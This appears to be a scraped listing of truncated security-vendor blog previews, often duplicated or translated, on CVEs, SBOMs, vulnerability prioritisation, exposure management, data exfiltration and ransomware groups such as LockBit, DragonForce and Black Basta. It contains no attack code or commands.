Setting up and contributing to the DShield honeypot project [1] as an ISC intern is a meaningful part of the BACS program at SANS [2]. Over the last several months I've been thrilled to observe real-time SSH/Telnet activity, check every new file hash and TTY log and hunt for unique http requests. That sa
Tenable
How much cyber risk does AI create for organizations? 457 million security issues. Here’s what you can do about it.
blogs_tenable·2026-06-24
CVE-2024-21762 How much cyber risk does AI create for organizations? 457 million security issues. Here’s what you can do about it.
## How much cyber risk does AI create for organizations? 457 million security issues. Here’s what you can do about it.
Over a 30 day period, Tenable detected 457 million AI-related security issues among 7,000-plus organizations, an average of 62,000 exposures per organization. If we didn’t already know that shadow AI was a problem, data like this makes it clear every organization needs to visualize, map, assess, and protect with a comprehensive exposure management program.
## Key takeaways
AI tools — approved and unapproved — are driving a massive wave of daily exposures, including an average of 62,000 per organization during a recent 30-day period. This is creating AI security issues that are primarily tied to misconfigurations and unmanaged dependencies rather than standard CVEs.
To
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Zscaler
Prioritize Exposures with Zero Trust | Exposure Management
blogs_zscaler·2026-02-23
Prioritize Exposures with Zero Trust | Exposure Management
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Wiz
What is CVE (Common Vulnerabilities and Exposures)? | Wiz
blogs_wiz·2026-01-16
What is CVE (Common Vulnerabilities and Exposures)? | Wiz
## What is a CVE (Common Vulnerabilities and Exposures)?
A CVE, or Common Vulnerabilities and Exposures, is a standardized identifier used to reference a publicly disclosed security vulnerability. Its primary purpose is to ensure that everyone in the security ecosystem is talking about the same issue when a vulnerability is discovered.
Before CVEs existed, the same vulnerability might be described differently by vendors, researchers, and security tools. That made coordination difficult. It was not always clear whether two advisories referred to the same flaw or to different ones. CVEs solved this problem by introducing a single, shared naming system.
When a vulnerability is assigned a CVE, it means the issue has been acknowledged, documented, and made publicly referenceable. It does not
Wiz
What is CVE (Common Vulnerabilities and Exposures)? | Wiz
blogs_wiz·2026-01-16
What is CVE (Common Vulnerabilities and Exposures)? | Wiz
## What is a CVE (Common Vulnerabilities and Exposures)?
A CVE, or Common Vulnerabilities and Exposures, is a standardized identifier used to reference a publicly disclosed security vulnerability. Its primary purpose is to ensure that everyone in the security ecosystem is talking about the same issue when a vulnerability is discovered.
Before CVEs existed, the same vulnerability might be described differently by vendors, researchers, and security tools. That made coordination difficult. It was not always clear whether two advisories referred to the same flaw or to different ones. CVEs solved this problem by introducing a single, shared naming system.
When a vulnerability is assigned a CVE, it means the issue has been acknowledged, documented, and made publicly referenceable. It does not
Wiz
What is dependency scanning in cloud security? | Wiz
blogs_wiz·2025-12-26
What is dependency scanning in cloud security? | Wiz
## What is dependency scanning?
Dependency scanning is the automated analysis of the third-party libraries, frameworks, and packages that developers use to build applications. Instead of reviewing the code you write, it inspects the external open-source and commercial components you import to find known security risks. This process is often referred to as software composition analysis (SCA).
This scanning identifies known vulnerabilities, cataloged as Common Vulnerabilities and Exposures (CVEs), in both direct and transitive dependencies.
Direct dependencies: These are the libraries you explicitly list in your project's manifest file.
Transitive dependencies: These are the libraries that your direct dependencies rely on to function, often pulling in a deep tree of extra code.
package.
Wiz
What is dependency scanning in cloud security? | Wiz
blogs_wiz·2025-12-26
What is dependency scanning in cloud security? | Wiz
## What is dependency scanning?
Dependency scanning is the automated analysis of the third-party libraries, frameworks, and packages that developers use to build applications. Instead of reviewing the code you write, it inspects the external open-source and commercial components you import to find known security risks. This process is often referred to as software composition analysis (SCA).
This scanning identifies known vulnerabilities, cataloged as Common Vulnerabilities and Exposures (CVEs), in both direct and transitive dependencies.
- Direct dependencies: These are the libraries you explicitly list in your project's manifest file.
- Transitive dependencies: These are the libraries that your direct dependencies rely on to function, often pulling in a deep tree of extra code.
A dep
Wiz
CVE Scanning: What It Is, How It Works and Why It Matters | Wiz
blogs_wiz·2025-12-19·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE Scanning: What It Is, How It Works and Why It Matters | Wiz
## What is CVE scanning?
CVE scanning is the automated process of checking your software, systems, and networks against a database of known security flaws to identify vulnerabilities before attackers can exploit them. This process uses specialized tools to compare your installed software versions and configurations against the Common Vulnerabilities and Exposures (CVE) list.
A CVE is a standardized identifier, such as "CVE-2021-44228," that allows security teams and vendors to share information about a specific vulnerability consistently. Scanners reference public repositories like the National Vulnerability Database (NVD) or MITRE to find matches in your environment.
Unlike broad vulnerability scanning that might look for general weaknesses, CVE scanning specifically targets cataloged
Wiz
CVE Scanning: What It Is, How It Works and Why It Matters | Wiz
blogs_wiz·2025-12-19·CVSS 10.0
CVE-2021-44228 [CRITICAL] CVE Scanning: What It Is, How It Works and Why It Matters | Wiz
## What is CVE scanning?
CVE scanning is the automated process of checking your software, systems, and networks against a database of known security flaws to identify vulnerabilities before attackers can exploit them. This process uses specialized tools to compare your installed software versions and configurations against the Common Vulnerabilities and Exposures (CVE) list.
A CVE is a standardized identifier, such as "CVE-2021-44228," that allows security teams and vendors to share information about a specific vulnerability consistently. Scanners reference public repositories like the National Vulnerability Database (NVD) or MITRE to find matches in your environment.
Unlike broad vulnerability scanning that might look for general weaknesses, CVE scanning specifically targets cataloged
Wiz
Attack surfaces vs. attack vectors: What security teams need to know | Wiz
blogs_wiz·2025-12-12
Attack surfaces vs. attack vectors: What security teams need to know | Wiz
## Attack surface and attack vector fundamentals
Today’s rapid CI/CD cycles and infrastructure-as-code (IaC) pipelines flood your environment with new assets and configurations. Assets like temporary services and exposed non-standard ports deploy faster than security teams can manually inventory them.
On top of that, security teams often mistakenly prioritize firefighting over foundational security, defaulting to reactive, vector-focused triage—usually centered around high-profile threats reported in news headlines. This consumes resources that could go instead towards long-term attack surface reduction strategies.
A better approach is to take a strategic, unified code-to-cloud perspective that can manage both security hygiene and active threats at velocity. Code-to-cloud security means
Wiz
Attack surfaces vs. attack vectors: What security teams need to know | Wiz
blogs_wiz·2025-12-12
Attack surfaces vs. attack vectors: What security teams need to know | Wiz
## Attack surface and attack vector fundamentals
Today’s rapid CI/CD cycles and infrastructure-as-code (IaC) pipelines flood your environment with new assets and configurations. Assets like temporary services and exposed non-standard ports deploy faster than security teams can manually inventory them.
On top of that, security teams often mistakenly prioritize firefighting over foundational security, defaulting to reactive, vector-focused triage—usually centered around high-profile threats reported in news headlines. This consumes resources that could go instead towards long-term attack surface reduction strategies.
A better approach is to take a strategic, unified code-to-cloud perspective that can manage both security hygiene and active threats at velocity. Code-to-cloud security means
Wiz
What Is Arbitrary Code Execution? ACE Attacks Explained | Wiz
blogs_wiz·2025-11-30
What Is Arbitrary Code Execution? ACE Attacks Explained | Wiz
## What is arbitrary code execution?
Arbitrary code execution is when an attacker tricks your system into running their malicious code without permission. Think of it like someone breaking into your house and using your computer to do whatever they want.
When attackers achieve ACE, they can execute any commands they choose on your system. This lets attackers run code with the privileges of the compromised process—which could be a low-privilege web service account or a high-privilege system daemon. The actual control level depends on what permissions the exploited application already has. It's one of the worst types of security vulnerabilities because it hands over complete system access to the attacker.
Cloud environments change the blast radius calculus for ACE attacks. If network segm
Wiz
What Is Arbitrary Code Execution? ACE Attacks Explained | Wiz
blogs_wiz·2025-11-30
What Is Arbitrary Code Execution? ACE Attacks Explained | Wiz
## What is arbitrary code execution?
Arbitrary code execution is when an attacker tricks your system into running their malicious code without permission. Think of it like someone breaking into your house and using your computer to do whatever they want.
When attackers achieve ACE, they can execute any commands they choose on your system. This lets attackers run code with the privileges of the compromised process—which could be a low-privilege web service account or a high-privilege system daemon. The actual control level depends on what permissions the exploited application already has. It's one of the worst types of security vulnerabilities because it hands over complete system access to the attacker.
Cloud environments change the blast radius calculus for ACE attacks. If network segm
Wiz
Explication de la nomenclature logicielle (SBOM) | Wiz
blogs_wiz·2025-11-17
Explication de la nomenclature logicielle (SBOM) | Wiz
## Qu’est-ce qu’un SBOM ?
Une nomenclature logicielle (SBOM) répertorie tous les composants de votre logiciel, garantissant ainsi la clarté et le contrôle des chaînes d’approvisionnement.
Les SBOM permettent de réagir rapidement aux vulnérabilités, comme on l’a vu avec Log4j et SolarWinds, renforçant ainsi les défenses de la chaîne d’approvisionnement.
Les mandats réglementaires tels que PCI DSS et les exigences gouvernementales lient directement la sécurité à l’adoption du SBOM.
L’automatisation de la génération de SBOM élimine les erreurs et garantit un suivi des vulnérabilités à jour.
L’analyse SBOM sans agent de Wiz offre des informations en temps réel, aidant les équipes à rester au fait de l’évolution des environnements logiciels.
## Qu’est-ce qu’un SBOM ?
Une nomenclature log
Wiz
SBOM: How it Works, What it Includes, and How to Implement | Wiz
blogs_wiz·2025-11-17·CVSS 10.0
[CRITICAL] SBOM: How it Works, What it Includes, and How to Implement | Wiz
## What is an SBOM?
A software bill of materials (SBOM) provides a detailed inventory of every software component in an application. It does so by identifying open-source and commercial third-party dependencies and listing metadata, like component names, descriptions, versions, and licenses.
Modern systems—especially those that support the supply chain ecosystem—combine elements from multiple sources, making them susceptible to supply chain attacks that exploit vulnerabilities . By documenting each component, SBOMs simplify vulnerability management and give security teams clear insight into potential risks.
Unlike traditional inventory lists, SBOMs track nested dependencies and provenance to support trust and compliance throughout your software delivery life cycle ( SDLC ). This is beca
Wiz
Spiegazione della distinta base del software (SBOM) | Wiz
blogs_wiz·2025-11-17
Spiegazione della distinta base del software (SBOM) | Wiz
## Che cos'è una SBOM?
Una distinta base del software (SBOM) elenca tutti i componenti del software, garantendo chiarezza e controllo sulle catene di approvvigionamento.
Le SBOM consentono risposte rapide alle vulnerabilità, come si è visto con Log4j e SolarWinds, rafforzando le difese della supply chain.
I mandati normativi come PCI DSS e i requisiti governativi legano la sicurezza direttamente all'adozione della SBOM.
L'automazione della generazione di SBOM elimina gli errori e garantisce un monitoraggio aggiornato delle vulnerabilità.
La scansione SBOM senza agente di Wiz offre informazioni in tempo reale, aiutando i team a rimanere al passo con i cambiamenti degli ambienti software.
## Che cos'è una SBOM?
Una distinta base software (SBOM) è un inventario completo che descrive in
Wiz
Software-Stückliste (SBOM) erklärt | Wiz
blogs_wiz·2025-11-17
Software-Stückliste (SBOM) erklärt | Wiz
## Was ist eine SBOM?
- Eine Software-Stückliste (SBOM) listet alle Komponenten Ihrer Software auf und sorgt so für Klarheit und Kontrolle über die Lieferketten.
- SBOMs ermöglichen schnelle Reaktionen auf Schwachstellen, wie bei Log4j und SolarWinds, und stärken die Abwehr der Lieferkette.
- Regulatorische Auflagen wie PCI DSS und behördliche Anforderungen binden die Sicherheit direkt an die Einführung von SBOM.
- Die Automatisierung der SBOM-Generierung eliminiert Fehler und gewährleistet eine aktuelle Schwachstellenverfolgung.
- Das agentenlose SBOM-Scanning von Wiz bietet Echtzeit-Einblicke und hilft Teams, den Überblick über sich ändernde Softwareumgebungen zu behalten.
## Was ist eine SBOM?
Eine Software-Stückliste (SBOM) ist ein umfassendes Inventar, das alle Softwarekomponenten
Wiz
Explication de la nomenclature logicielle (SBOM) | Wiz
blogs_wiz·2025-11-17
Explication de la nomenclature logicielle (SBOM) | Wiz
## Qu’est-ce qu’un SBOM ?
- Une nomenclature logicielle (SBOM) répertorie tous les composants de votre logiciel, garantissant ainsi la clarté et le contrôle des chaînes d’approvisionnement.
- Les SBOM permettent de réagir rapidement aux vulnérabilités, comme on l’a vu avec Log4j et SolarWinds, renforçant ainsi les défenses de la chaîne d’approvisionnement.
- Les mandats réglementaires tels que PCI DSS et les exigences gouvernementales lient directement la sécurité à l’adoption du SBOM.
- L’automatisation de la génération de SBOM élimine les erreurs et garantit un suivi des vulnérabilités à jour.
- L’analyse SBOM sans agent de Wiz offre des informations en temps réel, aidant les équipes à rester au fait de l’évolution des environnements logiciels.
## Qu’est-ce qu’un SBOM ?
Une nomenclatu
Wiz
Software-Stückliste (SBOM) erklärt | Wiz
blogs_wiz·2025-11-17
Software-Stückliste (SBOM) erklärt | Wiz
## Was ist eine SBOM?
Eine Software-Stückliste (SBOM) listet alle Komponenten Ihrer Software auf und sorgt so für Klarheit und Kontrolle über die Lieferketten.
SBOMs ermöglichen schnelle Reaktionen auf Schwachstellen, wie bei Log4j und SolarWinds, und stärken die Abwehr der Lieferkette.
Regulatorische Auflagen wie PCI DSS und behördliche Anforderungen binden die Sicherheit direkt an die Einführung von SBOM.
Die Automatisierung der SBOM-Generierung eliminiert Fehler und gewährleistet eine aktuelle Schwachstellenverfolgung.
Das agentenlose SBOM-Scanning von Wiz bietet Echtzeit-Einblicke und hilft Teams, den Überblick über sich ändernde Softwareumgebungen zu behalten.
## Was ist eine SBOM?
Eine Software-Stückliste (SBOM) ist ein umfassendes Inventar, das alle Softwarekomponenten einer
Wiz
Lista de materiais de software (SBOM) explicada | Wiz
blogs_wiz·2025-11-17·CVSS 10.0
[CRITICAL] Lista de materiais de software (SBOM) explicada | Wiz
## O que é um SBOM?
- Uma lista de materiais de software (SBOM) lista todos os componentes do seu software, garantindo clareza e controle sobre as cadeias de suprimentos.
- Os SBOMs permitem respostas rápidas a vulnerabilidades, como visto com o Log4j e o SolarWinds, fortalecendo as defesas da cadeia de suprimentos.
- Mandatos regulatórios como PCI DSS e requisitos governamentais vinculam a segurança diretamente à adoção do SBOM.
- A automação da geração de SBOM elimina erros e garante o rastreamento atualizado de vulnerabilidades.
- A varredura SBOM sem agente da Wiz oferece insights em tempo real, ajudando as equipes a se manterem atualizadas sobre os ambientes de software em constante mudança.
## O que é um SBOM?
Uma lista de materiais de software (SBOM) é um inventário abrangente qu
Wiz
Spiegazione della distinta base del software (SBOM) | Wiz
blogs_wiz·2025-11-17
Spiegazione della distinta base del software (SBOM) | Wiz
## Che cos'è una SBOM?
- Una distinta base del software (SBOM) elenca tutti i componenti del software, garantendo chiarezza e controllo sulle catene di approvvigionamento.
- Le SBOM consentono risposte rapide alle vulnerabilità, come si è visto con Log4j e SolarWinds, rafforzando le difese della supply chain.
- I mandati normativi come PCI DSS e i requisiti governativi legano la sicurezza direttamente all'adozione della SBOM.
- L'automazione della generazione di SBOM elimina gli errori e garantisce un monitoraggio aggiornato delle vulnerabilità.
- La scansione SBOM senza agente di Wiz offre informazioni in tempo reale, aiutando i team a rimanere al passo con i cambiamenti degli ambienti software.
## Che cos'è una SBOM?
Una distinta base software (SBOM) è un inventario completo che descr
Wiz
SBOM: How it Works, What it Includes, and How to Implement | Wiz
blogs_wiz·2025-11-17·CVSS 10.0
[CRITICAL] SBOM: How it Works, What it Includes, and How to Implement | Wiz
## What is an SBOM?
A software bill of materials (SBOM) provides a detailed inventory of every software component in an application. It does so by identifying open-source and commercial third-party dependencies and listing metadata, like component names, descriptions, versions, and licenses.
Modern systems—especially those that support the supply chain ecosystem—combine elements from multiple sources, making them susceptible to supply chain attacks that exploit vulnerabilities. By documenting each component, SBOMs simplify vulnerability management and give security teams clear insight into potential risks.
Unlike traditional inventory lists, SBOMs track nested dependencies and provenance to support trust and compliance throughout your software delivery life cycle (SDLC). This is because
Wiz
Explicación de la lista de materiales de software (SBOM) | Wiz
blogs_wiz·2025-11-17
Explicación de la lista de materiales de software (SBOM) | Wiz
## ¿Qué es un SBOM?
- Una lista de materiales de software (SBOM) enumera todos los componentes de su software, lo que garantiza la claridad y el control de las cadenas de suministro.
- Los SBOM permiten respuestas rápidas a las vulnerabilidades, como se ha visto con Log4j y SolarWinds, lo que fortalece las defensas de la cadena de suministro.
- Los mandatos regulatorios como PCI DSS y los requisitos gubernamentales vinculan la seguridad directamente con la adopción de SBOM.
- La automatización de la generación de SBOM elimina errores y garantiza un seguimiento actualizado de las vulnerabilidades.
- El escaneo SBOM sin agentes de Wiz ofrece información en tiempo real, lo que ayuda a los equipos a mantenerse al tanto de los entornos de software cambiantes.
## ¿Qué es un SBOM?
Una lista de
Wiz
Lista de materiais de software (SBOM) explicada | Wiz
blogs_wiz·2025-11-17·CVSS 10.0
[CRITICAL] Lista de materiais de software (SBOM) explicada | Wiz
## O que é um SBOM?
Uma lista de materiais de software (SBOM) lista todos os componentes do seu software, garantindo clareza e controle sobre as cadeias de suprimentos.
Os SBOMs permitem respostas rápidas a vulnerabilidades, como visto com o Log4j e o SolarWinds, fortalecendo as defesas da cadeia de suprimentos.
Mandatos regulatórios como PCI DSS e requisitos governamentais vinculam a segurança diretamente à adoção do SBOM.
A automação da geração de SBOM elimina erros e garante o rastreamento atualizado de vulnerabilidades.
A varredura SBOM sem agente da Wiz oferece insights em tempo real, ajudando as equipes a se manterem atualizadas sobre os ambientes de software em constante mudança.
## O que é um SBOM?
Uma lista de materiais de software (SBOM) é um inventário abrangente que deta
Wiz
Vulnerability Threat Intelligence: Turning Data into Defense | Wiz
blogs_wiz·2025-10-23
Vulnerability Threat Intelligence: Turning Data into Defense | Wiz
## What is vulnerability threat intelligence?
Vulnerability threat intelligence is the practice of combining vulnerability assessment data with real-world threat information to understand which security weaknesses actually matter. This means you're not just looking at a list of vulnerabilities—you're seeing which ones attackers are actively exploiting right now.
TL;DR: Vulnerability threat intelligence combines CVE data with real-world exploitation evidence (CISA KEV, EPSS scores), network exposure, and asset criticality to prioritize which vulnerabilities to fix first—focusing remediation on threats that could actually harm your business.
This approach is also called threat-informed vulnerability management, vulnerability intelligence, or KEV-driven prioritization. Regardless of the te
Wiz
Vulnerability Threat Intelligence: Turning Data into Defense | Wiz
blogs_wiz·2025-10-23
Vulnerability Threat Intelligence: Turning Data into Defense | Wiz
## What is vulnerability threat intelligence?
Vulnerability threat intelligence is the practice of combining vulnerability assessment data with real-world threat information to understand which security weaknesses actually matter. This means you're not just looking at a list of vulnerabilities—you're seeing which ones attackers are actively exploiting right now.
TL;DR: Vulnerability threat intelligence combines CVE data with real-world exploitation evidence (CISA KEV, EPSS scores), network exposure, and asset criticality to prioritize which vulnerabilities to fix first—focusing remediation on threats that could actually harm your business.
This approach is also called threat-informed vulnerability management, vulnerability intelligence, or KEV-driven prioritization. Regardless of the te
Huntress
Ten Years of Resilience, Innovation & Community-Driven Defense
blogs_huntress·2025-08-25·CVSS 8.8
[HIGH] Ten Years of Resilience, Innovation & Community-Driven Defense
The world of cybersecurity has been a wild ride over the last decade. As attackers stepped up their game year over year, the security community responded and adapted with resilience and ingenuity to each new wave of threats.
Attackers tested our limits time and time again with bolder, more cutting-edge cyberattacks: ransomware, supply chain compromises, zero-day vulnerabilities, and more. But every single breach, compromise, and exploited vulnerability taught us something new, pushed us harder to innovate and stay steps ahead, brought our security community closer together, and rallied us to wreck hackers.
As we celebrate our 10th anniversary at Huntress this month, we’re pausing to look back at the events that have shaped the entire cybersecurity community. Understanding where we've bee
Fortinet
Old Miner, New Tricks | FortiGuard Labs
blogs_fortinet·2025-07-16
Old Miner, New Tricks | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Old Miner, New Tricks
H2miner Resurfaces with Lcrypt0rx Ransomware
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
Adversary Infrastructure & Tool Details
The Curious Case of Lcryx Ransomware
H2Miner Sample Analysis
Script Name: ce.sh
Script Name: spr.sh
Script Name: cpr.sh
Script Name: 1.ps1
Lcrypt0rx Sample Analysis
Script Name: Lcrypt0rx.vbs
Conclusion
Fortinet Protections
IOCs
By Akshat Pradhan | July 16, 2025
Affected Platforms: Linux, Windows, Containers
Impacted Users: Any Organization
Impact: Data Encrypted for Impact, Compute Hijacking, Defacement, Sensitive data stolen.
Severity Level: Critical
The FortiCNAPP team, part of FortiGuard Labs, recently investigated a cluster of virtual private servers (VPS) used for Monero mining. The i
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
Prioritizing CVEs in the Cloud
blogs_sentinelone·2025-05-15
Prioritizing CVEs in the Cloud
## Foreword & Guest Bio
As part of this ongoing series, SentinelOne is excited to present a series of guest blogs from cloud security experts covering their views on cloud security best practices. Following on from blogs from Teri Radichel who focused on what AWS security gotchas to avoid and how to address the risk of faulty logic. We now have Rami McCarthy providing his view on cloud CVEs, and approach to vulnerability prioritization.
Rami is a self-proclaimed “security wonk”. Most recently, he helped build the Infrastructure Security program at Figma. Before that, he worked as a security consultant and helped scale security for a health-tech unicorn. He writes extensively about security over at ramimac.me and elsewhere.
## Introduction
Common Vulnerabilities and Exposures (CVEs) are
Sentinelone
Prioritizing CVEs in the Cloud
blogs_sentinelone·2025-05-15
Prioritizing CVEs in the Cloud
## Foreword & Guest Bio
As part of this ongoing series, SentinelOne is excited to present a series of guest blogs from cloud security experts covering their views on cloud security best practices. Following on from blogs from Teri Radichel who focused on what AWS security gotchas to avoid and how to address the risk of faulty logic. We now have Rami McCarthy providing his view on cloud CVEs, and approach to vulnerability prioritization.
Rami is a self-proclaimed “security wonk”. Most recently, he helped build the Infrastructure Security program at Figma. Before that, he worked as a security consultant and helped scale security for a health-tech unicorn. He writes extensively about security over at ramimac.me and elsewhere.
## Introduction
Common Vulnerabilities and Exposures (CVEs) are
Qualys
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations | Qualys
blogs_qualys·2025-05-08
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations | Qualys
#### Table of Contents
- Who is LockBit? How it Evolved and Operates
- Monero: The Coin of the Realm
- Patch or Mitigate Now: Critical CVEs Exploited by LockBit
- Beyond Traditional Endpoints: Other Compromised Systems
- Initial Access and Deployment
- Conclusion
The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table with 59,975 unique bitcoin addresses and a ‘chats’ table containing over 4,400 victim negotiation messages from December 2024 to the end of April 2025.
This blog post will
Qualys
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
blogs_qualys·2025-05-08
Inside LockBit: Defense Lessons from the Leaked LockBit Negotiations
## Table of Contents
Who is LockBit? How it Evolved and Operates
Monero: The Coin of the Realm
Patch or Mitigate Now: Critical CVEs Exploited by LockBit
Beyond Traditional Endpoints: Other Compromised Systems
Initial Access and Deployment
Conclusion
The LockBit ransomware gang recently suffered a significant data breach. Their dark web affiliate panels were defaced with the message “Don’t do crime CRIME IS BAD xoxo from Prague,” linking to a MySQL database dump. This archive contains a SQL file from LockBit’s affiliate panel database that includes twenty tables, notably including a ‘btc_addresses’ table with 59,975 unique bitcoin addresses and a ‘chats’ table containing over 4,400 victim negotiation messages from December 2024 to the end of April 2025.
This blog post will leverage
Sentinelone
DragonForce Ransomware Gang | From Hacktivists to High Street Extortionists
blogs_sentinelone·2025-05-03
DragonForce Ransomware Gang | From Hacktivists to High Street Extortionists
In recent weeks, the DragonForce ransomware group has been targeting UK retailers in a series of coordinated attacks causing major service disruptions. Prominent retailers such as Harrods, Marks and Spencer, and the Co-Op have all reported ongoing incidents affecting payment systems, inventory, payroll and other critical business functions.
DragonForce has previously been attributed for a number of notable cyber incidents including attacks on Honolulu OTS (Oahu Transit Services), the Government of Palau, Coca-Cola (Singapore), the Ohio State Lottery, and Yakult Australia.
In this post, we offer a high-level overview of the DragonForce group, discuss its targeting, initial access methods, and payloads. We further provide a comprehensive list of indicators and defensive recommendations to
Sentinelone
DragonForce Ransomware Gang | From Hacktivists to High Street Extortionists
blogs_sentinelone·2025-05-03
DragonForce Ransomware Gang | From Hacktivists to High Street Extortionists
In recent weeks, the DragonForce ransomware group has been targeting UK retailers in a series of coordinated attacks causing major service disruptions. Prominent retailers such as Harrods, Marks and Spencer, and the Co-Op have all reported ongoing incidents affecting payment systems, inventory, payroll and other critical business functions.
DragonForce has previously been attributed for a number of notable cyber incidents including attacks on Honolulu OTS (Oahu Transit Services), the Government of Palau, Coca-Cola (Singapore), the Ohio State Lottery, and Yakult Australia.
In this post, we offer a high-level overview of the DragonForce group, discuss its targeting, initial access methods, and payloads. We further provide a comprehensive list of indicators and defensive recommendations to
Fortinet
Key Takeaways from the 2025 Global Threat Landscape Report | FortiGuard Labs
blogs_fortinet·2025-04-28
Key Takeaways from the 2025 Global Threat Landscape Report | FortiGuard Labs
FORTIGUARD LABS THREAT RESEARCH
Key Takeaways from the 2025 Global Threat Landscape Report
FORTIGUARD SECURITY PORTFOLIO 2025 THREAT LANDSCAPE REPORT
By Douglas Jose Pereira dos Santos | April 28, 2025
In 2024, the FortiGuard Labs team observed a decisive shift in the threat landscape: Attackers are compressing the time between reconnaissance and compromise, and the window for defenders to respond is narrowing to days, sometimes hours.
The 2025 Global Threat Landscape Report draws on telemetry from Fortinet’s global sensor network and threat intelligence from FortiGuard Labs to deliver a clear message: the adversary advantage is accelerating. And unless organizations change how they measure and manage risk, the gap will continue to widen.
2025 Global Threat Landscape Report
Use this r
Wiz
What is Data Exfiltration? Techniques, Prevention, Examples | Wiz
blogs_wiz·2025-03-26
What is Data Exfiltration? Techniques, Prevention, Examples | Wiz
## What is data exfiltration?
Data exfiltration is when sensitive data is accessed without authorization or stolen. This can occur due to hackers exploiting misconfigurations, rogue insider threats, or other malicious activities. Just like any data breach , it can lead to financial loss, reputational damage, and business disruptions
Securing your cloud data in today’s threat landscape is critical, making protecting it against data exfiltration a top priority. This blog covers data exfiltration techniques, as well as the methods for preventing such attacks.
## Cloud Data Security Snapshot 2025
Sub-text: 54 % of cloud environments expose sensitive data on public-facing VMs—prime targets for exfiltration. Benchmark your own exposure and get remediation guidance in the report.
## What qua
Wiz
What is Data Exfiltration? Techniques, Prevention, Examples | Wiz
blogs_wiz·2025-03-26
What is Data Exfiltration? Techniques, Prevention, Examples | Wiz
## What is data exfiltration?
Data exfiltration is when sensitive data is accessed without authorization or stolen. This can occur due to hackers exploiting misconfigurations, rogue insider threats, or other malicious activities. Just like any data breach, it can lead to financial loss, reputational damage, and business disruptions
Securing your cloud data in today’s threat landscape is critical, making protecting it against data exfiltration a top priority. This blog covers data exfiltration techniques, as well as the methods for preventing such attacks.
Cloud Data Security Snapshot 2025Sub-text: 54 % of cloud environments expose sensitive data on public-facing VMs—prime targets for exfiltration. Benchmark your own exposure and get remediation guidance in the report.Download report
##
Greynoiseio
GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
blogs_greynoiseio·2025-03-06·CVSS 9.1
[CRITICAL] GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemys Playbook
Attackers Move Fast
How Qualys Can Help
